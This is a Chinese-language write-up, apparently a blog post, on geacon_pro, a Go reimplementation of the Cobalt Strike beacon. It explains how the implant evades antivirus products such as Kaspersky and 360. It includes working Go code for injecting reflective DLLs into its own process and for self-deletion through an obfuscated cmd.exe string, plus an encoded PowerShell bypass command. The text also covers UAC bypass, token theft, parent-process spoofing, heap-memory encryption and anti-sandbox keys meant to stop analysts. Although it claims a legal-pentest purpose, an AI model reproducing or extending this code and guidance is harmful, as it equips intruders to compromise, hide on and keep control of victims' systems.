一、概述
项目链接为
本项目基于项目对cobaltstrike的beacon进行了重构,并适配了大部分Beacon的功能,支持4.1+版本。致力于做成不局限于cs功能的跨平台后渗透免杀工具。
该项目仅用于对CobaltStrike协议的学习测试以及合法的渗透测试。请勿使用于任何非法用途,由此产生的后果自行承担。
本项目与好兄弟Z3ratu1共同开发,他实现了一版支持4.0版本的,我这边实现了一版支持4.1及以上版本的beacon,大致功能类似,有部分功能不同。具体的使用方法请移步链接,这里主要说一下实现的思路。如果有师傅对cs协议感兴趣可以看鸡哥相关的文章。
二、实现的功能
windows平台支持的功能:
sleep、shell、upload、download、exit、cd、pwd、file_browse、ps、kill、getuid、mkdir、rm、cp、mv、run、execute、drives、powershell-import、powershell命令混淆、免杀bypassuac(uac-token-duplication)、免杀系统服务提权(svc-exe)、execute-assembly(不落地执行c#)、多种线程注入的方法(可自己更换源码)、spawn、inject、shinject、dllinject(反射型dll注入)、管道的传输、多种cs原生反射型dll注入(mimikatz、portscan、screenshot、keylogger等)、令牌的窃取与还原、令牌的制作、权限的获取、runu父进程欺骗、代理发包、自删除、timestomp更改文件时间等功能。支持cna自定义插件的reflectiveDll、execute-assembly、powershell、powerpick、upload and execute等功能
linux和mac平台支持的功能:
sleep、shell、upload、download、exit、cd、pwd、file_browse、ps、kill、getuid、mkdir、rm、cp、mv、自删除、timestomp
后续会添加linux与mac平台下后渗透功能
进程管理部分、文件管理部分支持图形化交互
C2profile:
适配了C2profile流量侧的设置与部分主机侧的设置,支持的算法有base64、base64url、mask、netbios、netbiosu。
三、整体的思路
传统cs的免杀偏向于如何加载上线,但是杀软对beacon的特征查得非常严,尤其是卡巴这种查内存的,因此不如自己重构一个。
免杀主要体现在三个方面:
- 由于是重构的,因此没有beacon的特征,针对beacon特征的杀软是检测不出来的。
- golang本身具备一定的免杀性
- 针对各功能实现了免杀,cs部分不免杀的功能得到了更换
cs的通信协议
我们主要通过鸡哥的数篇文章以及https://github.com/WBGlIl/ReBeacon_Src来入门cs的通信协议以及cs原生的beacon实现。
之后我们根据实战的需求来调试并实现beacon的各种功能。同时在实现的时候还需要考虑稳定性以及体积的大小。
跨平台
由于我们想实现的是跨平台beacon,因此部分功能需要分平台实现,但是不同平台间同一个功能部分的实现又是相同的。我们抽出了一个service层来实现不同平台间功能重复的部分,进而减少代码的冗余。
功能实现与免杀
虽然是重构beacon,但是很多地方原封不动照搬cs的原生实现并不是很好,而且实现的语言也不一样。因此我们对部分功能进行了实现的调整,同时将cs不免杀的功能进行了替换,并针对特定功能集成了免杀的项目。
考虑到开源后exe被查杀的情况,也可以使用https://github.com/WBGlIl/go-ReflectiveDLL将geacon_pro转换成反射型dll的形式来灵活加载。或者也可以用其他项目转成shellcode的形式。
代码的思路结构
我们用main.go作为主函数,在beacon第一次与服务端通信之前执行隐藏窗口、反沙箱等操作。如果成功建立了连接则每隔一段时间向服务端发送请求,查看是否有需要下发的命令及数据,如果有的话则根据下发的命令号进行不同的处理。
sysinfo包中实现了获取不同平台下目标主机的基本信息的功能,以及拼装了beacon与服务器建立通信所需的meta数据。
services.go实现了对不同命令的跨平台处理。
packet包中的commands_windows.go、commands_linux.go、commands_darwin.go处理具体不同平台的底层实现。windows平台下部分复杂的功能被拆分成execute_assembly.go、jobs.go、token.go等来单独实现。总的来说packet包实现了对命令的具体的处理操作以及通信等功能。
config.go是geacon_pro的配置文件,类似于C2profile,geacon_pro在适配了大部分C2profile流量端与部分主机端配置的同时,还加入了代理发包、自删除、反沙箱等cs没有的设置。
四、部分功能实现的细节
命令的执行
命令的执行对应cs中的shell、run、execute三个命令,区别在于shell调用cmd,run调用执行的程序本身,而execute无回显。
geacon基于go的os/exec实现了跨平台的shell,但是我们在开发的时候发现golang的底层库并不是很稳定,在windows平台下执行部分命令的时候会突然崩溃。同时考虑到os/exec库的cmd不支持Token的使用,无法实现令牌的窃取,因此我们将命令执行的实现更改为了windows api CreateProcess。首先会判断当前是否有窃取/制作的Token,若有的话则用CreateProcessWithTokenW以Token权限来执行,没有的话则用CreateProcess执行。
shell和run在执行之后会用管道将结果回传给geacon_pro,而execute不会。
Linux和Mac平台下目前用/bin/bash来执行shell。
powershell
shell powershell是从cmd调用powershell,而powershell命令本身是以-nop -exec bypass -EncodedCommand参数来执行编码后的命令,如whoami
powershell -nop -exec bypass -EncodedCommand dwBoAG8AYQBtAGkA
geacon_pro目前对powershell命令集成了混淆(https://github.com/H4de5-7/powershell-obfuscation),但由于360对powershell命令执行监控的过于严格,powershell命令执行暂时过不了360,但是将混淆后落地的ps1文件用powershell -ExecutionPolicy Bypass -File执行可过360。师傅们可以用shell powershell执行未混淆的powershell。
cs的powerpick命令可以在内存中不通过powershell.exe执行powershell来绕过监控,不过在实现的时候发现powerpick可以执行成功但是部分情况拿不到回显(不知道是啥原因),师傅们可以考虑使用execute-assembly执行https://github.com/H4de5-7/powershell-bypass来代替powerpick。
powershell-import
beacon中有一个导入powershell模块的功能,将powershell后渗透利用框架导入到内存中方便后续的利用。我们的实现思路大致与Beacon类似,在目标主机上开一个端口放上module的内容,在下次要执行powershell命令的时候download下载该端口的module内容并用iex进行不落地的执行。尽管是不落地的执行,但最好还是把powershell模块混淆下。
execute-assembly
execute-assembly是在内存中执行C#程序,用不落地执行来绕过杀软的查杀,在实战中很常用。
execute-assembly在cs原生beacon中的实现如下:
服务端下发的主体内容为patch过的用于开环境的反射型dll、.NET程序、执行的参数
1、用CreateProcess拉起来一个rundll32.exe(默认)进程
2、服务端下发patch之后的反射型dll,beacon将该反射型dll注入到1中的进程中并执行,该dll的作用是开.NET的环境。
3、beacon之后把.NET程序注到1的进程中并执行。
考虑到过于麻烦、某些杀软会查杀远程线程注入的操作、卡巴会内存查杀反射型dll、容易拿不到执行的回显,我们没采用beacon的实现,而是用https://github.com/timwhitez/Doge-CLRLoad实现了go的原生execute-assembly。
原生反射型dll注入
反射型dll注入是很流行的一个后渗透手段,通过找到ReflectiveLoader函数的位置并执行dll达成不落地执行,师傅们有兴趣的话可以去看看这个项目 ,是反射型dll注入技术的起源项目。
解包cobaltstrike.jar包后可发现在sleeve目录下有很多dll文件,并根据目标是x64或者x86来注入对应的反射型dll。
这些dll文件是加密了的,网上有解密的脚本。
cs为了追求稳定性,很多操作都是采用的fork&&run,即先用CreateProcess新建一个进程(默认是rundll32.exe),之后把shellcode/patch过后的反射型dll注入到该进程中。
以screenshot.dll为例,里面包含了屏幕截图与管道回传结果的代码。服务端对其解密后下发到beacon,beacon用线程注入将其注入到拉起的进程中来执行。然后服务端下发一条命令让beacon通过管道读取执行的结果,之后将读取到的结果回传给服务端。
不过很多杀软对fork&&run这种远程注入到其他进程的行为进行了监控,以360核晶为例会报远程线程注入的可疑行为。
为了规避这个被监控的点,我们尝试用注入自己的方式来执行shellcode/patch之后的反射型dll,然后通过管道来异步读取结果,发现稳定性也还不错。
我们发现所有原生反射型dll都有一个特点,就是会在最后调用ExitProcess来终止fork出来的进程。
如果注入自己的话肯定不能用ExitProcess关掉geacon_pro进程,因此我们做了一个简单的patch,将服务端下发的反射型dll中的ExitProcess更换为ExitThread\x00仅让其退出当前的线程。
进程注入
进程注入有shinject、dllinject两种。
区别在shinject注入shellcode到其他的进程中,而dllinject注入反射型dll到其他的进程中。
在实现的时候我们发现这两种命令的下发格式是一样的,因此我们对下发的内容进行判断,如果存在有reflectiveloader字样就认为是dllinject注入,反之是shinject注入。但由于目前dllinject其他的进程并不是很稳定,暂时只支持注入到自身。
与上文所说的原生反射型dll不同,cs并不会patch用户上传的反射型dll,只会在服务端计算下ReflectiveLoader偏移的位置并下发beacon端帮助注入。但我们这里原本的实现是在beacon端手动找了ReflectiveLoader的位置,后面懒得改了,就没有使用cs下发的偏移。找到ReflectiveLoader的位置之后注入,同时还有考虑有参数的情况,这里用CreateThread将参数传入:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
|
func DllInjectSelf(params []byte, b []byte) ([]byte, error) {
p, err :
=
pe.NewFile(bytes.NewReader(b))
if
err !
=
nil {
return
nil, err
}
ex, e :
=
p.Exports()
if
e !
=
nil {
return
nil, err
}
var RDIOffset uintptr
for
_, exp :
=
range
ex {
if
strings.Contains(strings.ToLower(exp.Name),
"reflectiveloader"
) {
RDIOffset
=
uintptr(rvaToOffset(p, exp.VirtualAddress))
}
}
process, err :
=
windows.GetCurrentProcess()
if
err !
=
nil {
return
nil, err
}
if
string(params)
=
=
"\x00"
{
ba, _, err :
=
VirtualAllocEx.Call(uintptr(process),
0
, uintptr(
len
(b)),
windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE)
if
ba
=
=
0
{
fmt.Println(
"VirtualAlloc Failed"
)
return
nil, errors.New(
"VirtualAlloc Failed"
)
}
if
err !
=
nil && err.Error() !
=
"The operation completed successfully."
{
return
nil, err
}
_, _, err
=
RtlCopyMemory.Call(ba, (uintptr)(unsafe.Pointer(&b[
0
])), uintptr(
len
(b)))
if
err !
=
nil && err.Error() !
=
"The operation completed successfully."
{
return
nil, err
}
writeMem(ba, b)
Ldr :
=
ba
+
RDIOffset
oldProtect :
=
windows.PAGE_READWRITE
_, _, err
=
VirtualProtect.Call(ba, uintptr(
len
(b)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect)))
if
err !
=
nil && err.Error() !
=
"The operation completed successfully."
{
return
nil, err
}
thread, _, err :
=
CreateThread.Call(
0
,
0
, Ldr,
0
,
0
,
0
)
if
err !
=
nil && err.Error() !
=
"The operation completed successfully."
{
return
nil, err
}
_, _, err
=
WaitForSingleObject.Call(thread,
1000
)
if
err !
=
nil && err.Error() !
=
"The operation completed successfully."
{
return
nil, err
}
return
[]byte(
"DllInject success"
), nil
}
ba, _, err :
=
VirtualAllocEx.Call(uintptr(process),
0
, uintptr(
len
(b)
+
len
(params)),
windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE)
if
ba
=
=
0
{
fmt.Println(
"VirtualAlloc Failed"
)
return
nil, errors.New(
"VirtualAlloc Failed"
)
}
if
err !
=
nil && err.Error() !
=
"The operation completed successfully."
{
return
nil, err
}
_, _, err
=
RtlCopyMemory.Call(ba, (uintptr)(unsafe.Pointer(&b[
0
])), uintptr(
len
(b)))
if
err !
=
nil && err.Error() !
=
"The operation completed successfully."
{
return
nil, err
}
_, _, err
=
RtlCopyMemory.Call(ba
+
uintptr(
len
(b)), (uintptr)(unsafe.Pointer(¶ms[
0
])), uintptr(
len
(params)))
if
err !
=
nil && err.Error() !
=
"The operation completed successfully."
{
return
nil, err
}
writeMem(ba, b)
Ldr :
=
ba
+
RDIOffset
oldProtect :
=
windows.PAGE_READWRITE
_, _, err
=
VirtualProtect.Call(ba, uintptr(
len
(b)
+
len
(params)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect)))
if
err !
=
nil && err.Error() !
=
"The operation completed successfully."
{
return
nil, err
}
thread, _, err :
=
CreateThread.Call(
0
,
0
, Ldr, uintptr(unsafe.Pointer(¶ms[
0
])),
0
,
0
)
if
err !
=
nil && err.Error() !
=
"The operation completed successfully."
{
return
nil, err
}
_, _, err
=
WaitForSingleObject.Call(thread,
1000
)
if
err !
=
nil && err.Error() !
=
"The operation completed successfully."
{
return
nil, err
}
return
[]byte(
"DllInject success"
), nil
}
|
这里要感谢timwhitez师傅及https://github.com/timwhitez/Doge-RL的帮助
令牌
Token部分实现了令牌的窃取、令牌的制作、令牌的还原、权限的获取以及父进程欺骗。
main.go中会保存一个uintptr类型的Token,如果是默认令牌的话是0,如果成功窃取了令牌则将Token赋为该令牌。窃取之后会用windows api ImpersonateLoggedOnUser模拟上下文的令牌权限,不过由于上下文的权限不会影响其他的进程,因此shell、run、execute等需要创建其他进程的功能需要用CreateProcessWithTokenW。
父进程欺骗runu通过指定进程的pid,让执行的子进程的ppid为该pid,方便伪装进程。
如这里把main.exe伪装成winlogon.exe的子进程。
提权
bypassuac:geacon_pro集成了免杀bypassuac,即elevate中的uac-token-duplication。
administrator->system:geacon_pro集成了免杀系统服务svc-exe提权https://github.com/H4de5-7/elevate-bypass,即elevate中的svc-exe。同时也可以使用steal_token和runu来提权。
上线内网不出网主机
考虑到渗透中常常存在着内网主机上线的情况,即边缘主机出网,内网主机不出网的情况。
由于cs自带的socks4代理已经过时了,如果要修改成socks5的话还得改服务端,并且实现稳定的代理会增大不少的体积,因此我们在这里并没有实现内置的代理,推荐师傅们手传frp等稳定的代理。
尽管不支持开代理的功能,但是geacon_pro提供了代理发包的功能。可以通过设置config.go中的proxy参数,通过边缘主机的代理进行木马的上线。即如果已经在边缘主机192.168.140.130的8080端口开了个http代理,那么在config.go中设置ProxyOn为true,Proxy为http://192.168.140.130:8080即可令内网的geacon_pro上线服务器。
堆内存加密
beacon的实现中有堆内存加密(sleep_mask)这个功能,即在sleep之前将内存中数据加密,sleep之后再解开,可以避免杀软对内存的扫描。
堆内存加密的方法实现参考了https://cloud.tencent.com/developer/article/1949555。即在sleep之前先将除主线程之外的线程挂起,之后遍历堆对堆内存进行加密。sleep结束后解密并将线程恢复。不过该功能较为不稳定,有时在进行堆遍历的时候会突然卡住或者直接退出,并且考虑到后台可能会有keylogger或portscan这种的持久任务,将线程全部挂起有些不合适,如果有师傅有好的想法欢迎来讨论。同时我不太理解为什么go的time.Sleep函数在其他线程都挂起之后调用会一直沉睡,而调用windows.SleepEx就不会有问题,还望师傅们解答。我个人感觉go部分原生库的实现仍存在部分的bug。
字符集
cs在服务端与beacon通信的时候协商了字符集类型,如windows默认的是GBK,linux则是UTF-8。但是用go重构会有一个比较麻烦的问题,go对字符串的处理默认是UTF-8,但有时windows通信时服务端下发的命令中包含中文,由于是GBK无法进行正常的处理。因此我们做了一个统一,各平台默认的协商字符集均为UTF-8,这样避免了冗杂的处理环节,仅在回传的时候对执行的结果进行了判断,如果是GBK就先转换成UTF-8再回传:
1
2
3
4
5
6
7
8
9
10
11
|
func CodepageToUTF8(b []byte) ([]byte, error) {
if
!utf8.Valid(b) {
reader :
=
transform.NewReader(bytes.NewReader(b), simplifiedchinese.GBK.NewDecoder())
d, e :
=
ioutil.ReadAll(reader)
if
e !
=
nil {
return
nil, e
}
return
d, nil
}
return
b, nil
}
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
func DataProcess(callbackType
int
, b []byte) {
result :
=
b
var err error
if
callbackType
=
=
0
{
result, err
=
CodepageToUTF8(b)
if
err !
=
nil {
ErrorProcess(err)
}
}
finalPaket :
=
MakePacket(callbackType, result)
_, err
=
PushResult(finalPaket)
if
err !
=
nil {
ErrorProcess(err)
}
}
|
这里我们对callbackType进行了限制,因为有部分命令如ps、ls会对结果进行padding,这样可能会让utf8.Valid()把UTF-8的结果认为是GBK而进行错误的字符集转换。
自删除
cs没有做自删除的功能,我们添加了不同平台下的自删除功能。
windows平台下由于进程未退出的时候是无法自己删除自己的,常用的方法有bat与远程线程注入。
远程线程注入的缺点前面也提到了容易被杀软监控,因此我们这里简化了一下bat自删除,用CreateProcess新起了一个进程,在原进程执行完之后删除它:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
|
func DeleteSelf() ([]byte, error) {
var sI windows.StartupInfo
var pI windows.ProcessInformation
sI.ShowWindow
=
windows.SW_HIDE
filename, err :
=
os.Executable()
if
err !
=
nil {
return
nil, err
}
program, _ :
=
syscall.UTF16PtrFromString(
"c"
+
"m"
+
"d"
+
"."
+
"e"
+
"x"
+
"e"
+
" /c"
+
" d"
+
"e"
+
"l "
+
filename)
err
=
windows.CreateProcess(
nil,
program,
nil,
nil,
true,
windows.CREATE_NO_WINDOW,
nil,
nil,
&sI,
&pI)
if
err !
=
nil {
return
nil, errors.New(
"could not delete "
+
filename
+
" "
+
err.Error())
}
err
=
windows.SetPriorityClass(pI.Process, windows.IDLE_PRIORITY_CLASS)
if
err !
=
nil {
return
nil, err
}
return
[]byte(
"success delete"
), nil
}
|
反沙箱
cs没有做反沙箱的处理,我们添加了密钥反沙箱与时间反沙箱,后续会添加更多的反沙箱的功能。具体的内容可以在config.go中设置。
ExecuteKey可以进行简单的反沙箱,若密钥值为password,设置后执行的时候需要geacon_pro.exe password才可执行成功,沙箱或蓝队成员由于不知道密钥,因此无法执行。
ExecuteTime可以进行简单的反沙箱,若当前时间晚于设置的时间则执行失败,师傅们注意该设置是UTC时区。
备注
config.go中的Remark可以在上线的时候备注机子,方便区分不同应用场景。即如果Remark="test",上线机子的名称会被设置成为 ComputerName [test]。
异步
由于部分功能执行时间比较长,我们针对部分功能实现了异步处理,如命令执行、jobs、下载等功能。
这里有一个小坑,由于是异步,因此发包的顺序可能会乱,导致服务端接收到的包顺序会错乱,认为发生了重放攻击导致命令执行失败。需要在发包时对包的id上锁。
五、后续打算做的
1、简化配置的过程并加密配置文件
2、适配更多功能
3、集成更多的免杀工具
4、增加Linux和Mac平台下后渗透功能
5、增加代码混淆
6、hook服务端jar包类似冰蝎4.0让用户自定义流量加密特征
7、增加混淆的流量
8、混淆内存中的反射型dll
如果有师傅有建议或者想法欢迎来讨论!